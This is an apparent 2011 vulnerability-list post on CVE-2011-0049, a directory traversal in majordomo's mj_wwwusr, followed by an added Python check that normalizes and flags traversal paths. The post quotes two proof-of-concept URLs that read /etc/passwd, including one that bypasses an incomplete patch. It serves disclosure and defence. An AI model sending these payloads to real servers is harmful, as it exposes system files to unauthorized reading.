[VIM] CVE-2011-0049: majordomo directory traversal vulnerability
security curmudgeon
jericho at attrition.org
Thu Feb 10 23:38:05 CST 2011
OSVDB 70762, CVE-2011-0049, Secunia 43125, BID 46127, ISS 65113
Tenable Network Security discovered that the patch included in 20110130
was not sufficient to fully remediate this vulnerability. The patch
applied to snapshot 20110204 appears to remediate the issue correctly.
Please update your solutions to reflect this!
-------- Original Message --------
as you may be aware, there was a directory traversal vulnerability in
majordomo. PoC:
http://www.example.com/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=../../../../../../../etc/passwd
the VDBs all appear to be reporting build 20110130 as the fix, to include:
https://sitewat.ch/en/Advisory/View/1
http://secunia.com/advisories/43125
however, the patch included in 20110130 isn't sufficient. it can be
circumvented with the following PoC:
http://www.example.com/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=./../././../././../././../././../././../././../././../././../././../././.././etc/passwd
it appears this issue was fixed with 20110204.
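
Added example, not part of the original post and not majordomo's code or either patch: a check that normalizes the `extra` value before testing containment, so both PoC forms quoted above resolve to the same out-of-root path and are flagged. The root `/opt/majordomo/help` and the function names are assumptions made for illustration.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Assumed help-file root; the post does not give majordomo's real path.
HELP_ROOT = "/opt/majordomo/help"

# The two request forms quoted in the post.
POC_ORIGINAL = ("http://www.example.com/mj_wwwusr?passw=&list=GLOBAL&user=&func=help"
                "&extra=../../../../../../../etc/passwd")
POC_BYPASS = ("http://www.example.com/mj_wwwusr?passw=&list=GLOBAL&user=&func=help"
              "&extra=./../././../././../././../././../././../././../././../././"
              "../././../././.././etc/passwd")


def resolve_extra(extra, root=HELP_ROOT):
    """Return the normalized path for `extra`, or None if it leaves `root`.

    Normalization happens first, so "./" padding and repeated "../" segments
    collapse before the containment test. Comparing against root + "/" avoids
    accepting sibling directories such as "/opt/majordomo/helpless".
    """
    if "\x00" in extra:
        return None
    candidate = posixpath.normpath(posixpath.join(root, extra))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def escapes_root(url, root=HELP_ROOT):
    """True if any `extra` parameter in `url` resolves outside `root`.

    parse_qs percent-decodes values, so encoded dot and slash sequences are
    normalized the same way as literal ones.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return any(resolve_extra(v, root) is None for v in query.get("extra", []))


if __name__ == "__main__":
    for url in (POC_ORIGINAL, POC_BYPASS):
        print("outside root" if escapes_root(url) else "ok", url)
```

`posixpath.normpath` is purely lexical; code that opens the file should also resolve symlinks (for example with `os.path.realpath`) before the containment test.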